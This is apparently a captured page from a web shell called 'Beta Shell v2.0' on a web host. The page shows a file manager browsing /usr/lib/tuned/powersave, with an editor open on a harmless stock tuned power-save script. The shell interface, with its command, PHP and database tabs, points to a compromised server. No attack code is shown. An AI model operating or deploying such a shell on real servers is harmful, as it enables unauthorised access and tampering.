Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
lib
/
tuned
/
powersave
Upload
4 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
script.sh
271 B
-rwxr-xr-x
2024-02-22 12:23:28
Edit
Del
tuned.conf
634 B
-rw-r--r--
2024-02-22 12:23:28
Edit
Del
Editing: script.sh
(271 B)
Path: /usr/lib/tuned/powersave/script.sh
Back
#!/bin/bash . /usr/lib/tuned/functions start() { [ "$USB_AUTOSUSPEND" = 1 ] && enable_usb_autosuspend enable_wifi_powersave return 0 } stop() { [ "$USB_AUTOSUSPEND" = 1 ] && disable_usb_autosuspend disable_wifi_powersave return 0 } process $@